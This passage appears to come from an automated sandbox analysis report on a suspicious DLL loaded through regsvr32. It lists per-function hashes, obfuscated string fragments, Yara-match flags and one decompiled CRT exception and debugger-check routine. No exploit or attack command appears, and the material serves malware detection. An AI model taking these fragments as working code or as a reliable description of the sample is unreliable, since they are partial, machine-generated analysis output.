                                • Instruction Fuzzy Hash: 4E32F4B1A0578C8BCBB9CF68C8997DD7BF0FB48318F90521DEA099B251CB745A45CB18
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: #X$$3$1P$H<,D$I$e$e
                                • API String ID: 0-63615268
                                • Opcode ID: f878a82ca4faae8fe20105a06ae6298662dc00276aeafef1a86afe3292831526
                                • Instruction ID: 84603d17c853973844c2c43058df0d3f37fc759f8199a5ada31f3ca4409f6e56
                                • Opcode Fuzzy Hash: f878a82ca4faae8fe20105a06ae6298662dc00276aeafef1a86afe3292831526
                                • Instruction Fuzzy Hash: 64E2CF715046898BDBF9DF24C88A7DD3BA1BB44344FA0C119E88ECE291DF745A8DEB41
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: $*TG$Ag9$N?$`S$jk7$yHb
                                • API String ID: 0-938425255
                                • Opcode ID: a8480cca88ee067c9f89c24fcf558755f915344c34e6418cf6ef844eb024a60c
                                • Instruction ID: 9f34faa7130dc1dd87f506cddbfe67dee9fd1f9295814769d0e47bce79b2000f
                                • Opcode Fuzzy Hash: a8480cca88ee067c9f89c24fcf558755f915344c34e6418cf6ef844eb024a60c
                                • Instruction Fuzzy Hash: 6D62E371A0530CDFCB59DFA8D18A6DDBBF1FF48344F004119E84AA72A0D7B4991ACB89
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: #X$3A<7$B.$Jq^$eIas$p<c$~;-
                                • API String ID: 0-2724674699
                                • Opcode ID: c830ff2e536ec82d4aacd995a299ed7dc96ce275305048a2346641cb28e12bef
                                • Instruction ID: 11eaaa9cd8c54950f626fcd1c6608fbf38bfda5f45ba0fc90d4db62925cbbc4d
                                • Opcode Fuzzy Hash: c830ff2e536ec82d4aacd995a299ed7dc96ce275305048a2346641cb28e12bef
                                • Instruction Fuzzy Hash: 4142EAB090438C8BCBB8DF64C8857DD7BF0FB48308F50852DEA1A9B251DBB05685CB98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 33%
                                			E000007FE7FEF9D2BE50(intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esp, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24) {
                                				intOrPtr _v4;
                                				void* _v12;
                                				signed long long _v24;
                                				signed int _v36;
                                				long long _v180;
                                				long long _v184;
                                				intOrPtr _v192;
                                				char _v196;
                                				intOrPtr _v204;
                                				long _v212;
                                				long long _v220;
                                				long long _v228;
                                				long long _v1212;
                                				long long _v1308;
                                				char _v1460;
                                				char _v1476;
                                				char _v1484;
                                				int _v1492;
                                				long long _v1500;
                                				long long _v1508;
                                				long long _v1516;
                                				long long _v1524;
                                				long long _v1532;
                                				long long _v1540;
                                				void* _t51;
                                				signed long long _t80;
                                				long long _t85;
                                				void* _t100;
                                
                                				_a24 = r8d;
                                				_a16 = __edx;
                                				_a8 = __ecx;
                                				_t80 =  *0xf9d4b018; // 0x6ebd4e3f5ce4
                                				_v24 = _t80 ^ _t100 - 0x00000610;
                                				if (_a8 == 0xffffffff) goto 0xf9d2be8d;
                                				E000007FE7FEF9D28D90(_t51, _a8);
                                				_v184 = 0;
                                				memset(__edi, 0, 0x94 << 0);
                                				_v1508 =  &_v196;
                                				_v1500 =  &_v1460;
                                				_v1492 = 0;
                                				_v212 = 0;
                                				__imp__RtlCaptureContext();
                                				_t85 = _v1212;
                                				_v220 = _t85;
                                				r8d = 0;
                                				0xf9d40e28();
                                				_v228 = _t85;
                                				if (_v228 == 0) goto 0xf9d2bf64;
                                				_v1516 = 0;
                                				_v1524 =  &_v1476;
                                				_v1532 =  &_v1484;
                                				_v1540 =  &_v1460;
                                				0xf9d40e22();
                                				goto 0xf9d2bf84;
                                				_v1212 = _v12;
                                				_v1308 =  &_v12;
                                				_v196 = _a4;
                                				_v192 = _a12;
                                				_v180 = _v12;
                                				_v1492 = IsDebuggerPresent();
                                				SetUnhandledExceptionFilter(??);
                                				_v212 = UnhandledExceptionFilter(??);
                                				if (_v212 != 0) goto 0xf9d2bffb;
                                				if (_v1492 != 0) goto 0xf9d2bffb;
                                				if (_v4 == 0xffffffff) goto 0xf9d2bffb;
                                				return E000007FE7FEF9D23280(E000007FE7FEF9D28D90(_t59, _v4), _v4, __edx, _v36 ^ _t100 - 0x00000610, _v204, _v220);
                                			}
































                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                • String ID:
                                • API String ID: 1239891234-0
                                • Opcode ID: 3c99f19865488fa949415da8e2229a8dc4eaaacedc1a65a8015e4c0ea1d70d8e
                                • Instruction ID: ff33e713b9b9862e94e2d2fd4ae4d55f0027255630586c455cca821aadc81769
                                • Opcode Fuzzy Hash: 3c99f19865488fa949415da8e2229a8dc4eaaacedc1a65a8015e4c0ea1d70d8e
                                • Instruction Fuzzy Hash: 7041BE32909BC58AE6B08B14F8443AFB3A1F388355F50522996CD42BA8EB7ED095CF40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2359E), ref: 000007FEF9D2893B
                                • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2359E), ref: 000007FEF9D2894B
                                • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2359E), ref: 000007FEF9D28963
                                • GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2359E), ref: 000007FEF9D2897B
                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2359E), ref: 000007FEF9D28998
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                • String ID:
                                • API String ID: 1445889803-0
                                • Opcode ID: 3c45f80db2f34b613ab4c9fa771cbb066be9ba5f1b7e4cdc55cd1e9c18cefb40
                                • Instruction ID: 08a22431f858d3c52821bee646358606f5e13fcd060269a72eebdbe744b14aa1
                                • Opcode Fuzzy Hash: 3c45f80db2f34b613ab4c9fa771cbb066be9ba5f1b7e4cdc55cd1e9c18cefb40
                                • Instruction Fuzzy Hash: 7A21E62160AF0585DAB08B19FC5032E77E0E78DBA5F241235AADD83778EF3DD2948700
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Fg$UE;~$ibq$X$o
                                • API String ID: 0-4038568857
                                • Opcode ID: 478ae4c756925d4c0df58bf132ef81c61d708642842f5bb4a6db73d18922ca94
                                • Instruction ID: c65d31d342ee38981127283826f07a965cef744f0e08d64225b30ad95669dc15
                                • Opcode Fuzzy Hash: 478ae4c756925d4c0df58bf132ef81c61d708642842f5bb4a6db73d18922ca94
                                • Instruction Fuzzy Hash: B0A2E9B1E0470C9FCB59CFA8E48A6DEBBF2FB48344F004119E906B7251D7B49919CB99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: !g$!g$-{e$.9Y$7cm
                                • API String ID: 0-3613756181
                                • Opcode ID: 8466a7fe0396b74cedb6887ba44c1057051f2a552123ac4d034c792a786adc4e
                                • Instruction ID: bf5508b14f48093895fd1996fdb0e85e6185e8dd26636c64e6a2ba956b5e503a
                                • Opcode Fuzzy Hash: 8466a7fe0396b74cedb6887ba44c1057051f2a552123ac4d034c792a786adc4e
                                • Instruction Fuzzy Hash: 409231711483CB8BCB78CF54C845BEEBBE1FB84704F10852CE86A8BA51E7B49649DB41
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Ol$`P$i($km}&$ttR
                                • API String ID: 0-1254889785
                                • Opcode ID: 9493bf0160dfff7cf218a8f761ba212010c51dc1cc37675f8f08f25cb4825c85
                                • Instruction ID: 987162bd0b035dc474e6baf50d73a519649db35efcc54d1c771acda0ad58d409
                                • Opcode Fuzzy Hash: 9493bf0160dfff7cf218a8f761ba212010c51dc1cc37675f8f08f25cb4825c85
                                • Instruction Fuzzy Hash: 57422870908B488FD769CF79C48965EBBF1FB88748F204A1DE6A297271DB709845CF42
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: &JS$T'$T'$t7"$wHM
                                • API String ID: 0-3882947952
                                • Opcode ID: e1efb4f73683d5eb84ec2e51f9646df27f06f31a7415d6bac1a400d419ecf411
                                • Instruction ID: 5dfe4264b2e9e46270ab4916ee937e41ce96fb3ef9e59635e1bc08d1b7ce1cf5
                                • Opcode Fuzzy Hash: e1efb4f73683d5eb84ec2e51f9646df27f06f31a7415d6bac1a400d419ecf411
                                • Instruction Fuzzy Hash: C6C1E3B150464DDFCB98CF28D1856DA7BE0FF48318F41822AFC0A9B264D774DA68DB85
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 2T$=+%2$]|m$.s$9=
                                • API String ID: 0-2491194820
                                • Opcode ID: cf9153d85b611db8c4e34f9d3970acb18e39f17aceac1e5b04446b1241c988c8
                                • Instruction ID: b22ad84dfc9a36729601f04a7d34ea20b01e779292d252d1f9b28ced5abbce67
                                • Opcode Fuzzy Hash: cf9153d85b611db8c4e34f9d3970acb18e39f17aceac1e5b04446b1241c988c8
                                • Instruction Fuzzy Hash: AE911570D0978C8FDB99DFE8D046BDEBBB2EB15348F40412DE44AAB298D774550ACB41
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Strings
                                • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D25FE7
                                • HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d)., xrefs: 000007FEF9D260C7
                                • %hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d)., xrefs: 000007FEF9D2617C
                                • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D25EF9
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: U!t$)$o}$q
                                • API String ID: 0-3686089749
                                • Opcode ID: bf0474be6c6ce2e48f6d2d7926dbfb2caa288b201239c410f95da0c70b98d83b
                                • Instruction ID: 504cee08a43b26f7e4edd141fcc1dad3608ee18550f5ec8ccdea89eebec808be
                                • Opcode Fuzzy Hash: bf0474be6c6ce2e48f6d2d7926dbfb2caa288b201239c410f95da0c70b98d83b
                                • Instruction Fuzzy Hash: 74918CB190030E8FCB48CF68D58A5DE7FB1FB68398F204219F85696254D77496A5CFC4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 4<$4<$Hhr$J;}
                                • API String ID: 0-2050331814
                                • Opcode ID: c5a04ea52945682b476d42612895679d50d29c6124b176cb0c2b711214be2d9b
                                • Instruction ID: 3d3ba58424421bda00612f90d71964148b60402fac749f980543760ede98840e
                                • Opcode Fuzzy Hash: c5a04ea52945682b476d42612895679d50d29c6124b176cb0c2b711214be2d9b
                                • Instruction Fuzzy Hash: 7461F4B0615648DFDF58DF68C08A69A7BA1FB48354F00C12EFC1ADB294DB70DA58CB45
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ;$;$eQ%$_
                                • API String ID: 0-1753937898
                                • Opcode ID: afea0fbc1d0f044595d14710a3cdc41d7bc72a212051bdcef0ffdf3ac8c4ab3c
                                • Instruction ID: 3574068fecf093fcbc9a635d24f3027655c33c427b378eb3a0ef079df85d540d
                                • Opcode Fuzzy Hash: afea0fbc1d0f044595d14710a3cdc41d7bc72a212051bdcef0ffdf3ac8c4ab3c
                                • Instruction Fuzzy Hash: 868137705003CCABDBFACF28CC997D93BA0FB49354F50822AE94A8E250DF745B499B40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: :U$<;?:${(${(
                                • API String ID: 0-1086306767
                                • Opcode ID: adfd1542a6b862dcbbf80cb55e1091ef2c2665d1724c34312d1a81eba162a757
                                • Instruction ID: ff3a3435717f4ead1b58fb824901535bd9cf299cdf9a7bd1c813f3606ded2d6e
                                • Opcode Fuzzy Hash: adfd1542a6b862dcbbf80cb55e1091ef2c2665d1724c34312d1a81eba162a757
                                • Instruction Fuzzy Hash: 0861E0705187848BD768CF28C18965FBBF0FB8A748F10891EF68686260D7B6D948CB03
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Oh$h<$t010$|N.
                                • API String ID: 0-2324740333
                                • Opcode ID: 35c0cfe6136cac06300efd424f395a2521218bc7fc47dd603edd05c4400a0958
                                • Instruction ID: 16379aaf1bb4413e0c13418f9d8c18c2bc98b7e827952bd0a9b5f9990c6c03cf
                                • Opcode Fuzzy Hash: 35c0cfe6136cac06300efd424f395a2521218bc7fc47dd603edd05c4400a0958
                                • Instruction Fuzzy Hash: E051B1B090034A8BCF48DF68D48A4DE7FB1FB58398F60461DE85AAA250D37496A4CFC5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: GW$V{mu$dF
                                • API String ID: 0-3399639152
                                • Opcode ID: 13f3ce258387fdab81722341723304c211862b24c4b90673b1ab6d5c48b56b4d
                                • Instruction ID: 5d4924119bb90987b6c65e27c55bf51887eeb75551c0c0a5c8140b5b1edb0396
                                • Opcode Fuzzy Hash: 13f3ce258387fdab81722341723304c211862b24c4b90673b1ab6d5c48b56b4d
                                • Instruction Fuzzy Hash: B8F13F71508B888FD7B9CF28D48969EBBF0FB84744F20461EE5A59B270DBB49645CF02
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: K:$]w($n S$
                                • API String ID: 0-3322466707
                                • Opcode ID: c1684008171d4e306236772ac743a7b0f928483c20fc59153bd471c66e400ccf
                                • Instruction ID: e698a885d6bb162bf0ff3cac371d937558b4210aa05752a6266eb715b4493fc4
                                • Opcode Fuzzy Hash: c1684008171d4e306236772ac743a7b0f928483c20fc59153bd471c66e400ccf
                                • Instruction Fuzzy Hash: 94F11570D047588BDBA8DFA8C88A6DDBBF0FB48304F60821DD85AAB251DB749949DF40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: $L+$S'$$o%
                                • API String ID: 0-4100028055
                                • Opcode ID: 9fd258a3895b4d268f32f05a4a2d93e51bad250bed430a342084c072b36ef08c
                                • Instruction ID: 179b9f87c3a4f9e214743648708db8209e3d71a45a824f016a1577c5ed2144a1
                                • Opcode Fuzzy Hash: 9fd258a3895b4d268f32f05a4a2d93e51bad250bed430a342084c072b36ef08c
                                • Instruction Fuzzy Hash: 34F1DFB1504609DFCB98DF28C0896DE7BE0FB58358F41812AFC4A9B264D770DA68DB45
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: D"C!$r>$7
                                • API String ID: 0-4181936694
                                • Opcode ID: 541cc3c13b8465e2a0518f703328e58551f25428cc9c4eed4f201bddabca6e18
                                • Instruction ID: 0283378d108cf163dc6514248e6e0b5631fea62f1129ef615c9b8fd25e2e86b8
                                • Opcode Fuzzy Hash: 541cc3c13b8465e2a0518f703328e58551f25428cc9c4eed4f201bddabca6e18
                                • Instruction Fuzzy Hash: 1BE1EF70510B4CEBDBD9DF28D8CAADD3BA0FB48394FA06219FD0686250D775D989CB81
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 47T]$K_j$is[
                                • API String ID: 0-2699472077
                                • Opcode ID: f40290fddc4da9899e50fb62f60591b1b1e6ff44cb1495cdff8c692982a81ea2
                                • Instruction ID: 6016c1221021197edd7f817fb9cbd09fcb5ac8bbf6c5f54f5697c1ffe249b4d0
                                • Opcode Fuzzy Hash: f40290fddc4da9899e50fb62f60591b1b1e6ff44cb1495cdff8c692982a81ea2
                                • Instruction Fuzzy Hash: 2CD127719047CD8FCF99CFA8C88A6EE7BB1FB48344F50821DE80697651C7B4990ACB85
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: B+=$Mt$[4
                                • API String ID: 0-935141491
                                • Opcode ID: a60433d87628b4dd05d8c24f82dcc33c98af1bb7bb81019966b8dd8b9453b802
                                • Instruction ID: bf1f234f614a92c8f0daef92778263c373ce788cc2d228a45e1a9745d38385ec
                                • Opcode Fuzzy Hash: a60433d87628b4dd05d8c24f82dcc33c98af1bb7bb81019966b8dd8b9453b802
                                • Instruction Fuzzy Hash: 36F1D470505B888FDBB9DF24CC897EB7BA0FB94316F10551EE84A9A290DFB49648CF41
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: $c7$@%?5$b3
                                • API String ID: 0-1970763919
                                • Opcode ID: 9dd9411ae2ae8fe50429bce004b52f82e822d73dcaf286881c61fffa8cd320f1
                                • Instruction ID: 7544b270a4a1d87a4c453583f66bfc56a0d33d7204b7a287ddb0882fb61d0d22
                                • Opcode Fuzzy Hash: 9dd9411ae2ae8fe50429bce004b52f82e822d73dcaf286881c61fffa8cd320f1
                                • Instruction Fuzzy Hash: 48E158B5902748CFCB88DF68C69A59D7BF1FF59308F404029FC1A9A264D7B4D928CB49
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: #^$`]$%
                                • API String ID: 0-102912427
                                • Opcode ID: ca2120b3b73aeab9747ebd3a80ee073ee8f7bbd66699a0431753568d5f85675a
                                • Instruction ID: 878e7741f870b7fe1bc6c0f4a33361fdae8fd10665ac772b8c524eb0937c225a
                                • Opcode Fuzzy Hash: ca2120b3b73aeab9747ebd3a80ee073ee8f7bbd66699a0431753568d5f85675a
                                • Instruction Fuzzy Hash: FDB1277090474D8FCF48CF68C88A6DE7BF0FB48398F165219E85AA6250D778D549CF89
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: EQp$JK8[$kU
                                • API String ID: 0-1401246002
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: /@=`$h$zJ
                                • API String ID: 0-1145068787
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: $g$>6$nB
                                • API String ID: 0-1868063892
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: #\9$Vj+&$M
                                • API String ID: 0-3658199817
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: #X$d,U$d3
                                • API String ID: 0-3246363944
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: X9T[$Y)~$Zo
                                • API String ID: 0-3816472334
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: HR$HR$K)
                                • API String ID: 0-1226256413
                                Uniqueness

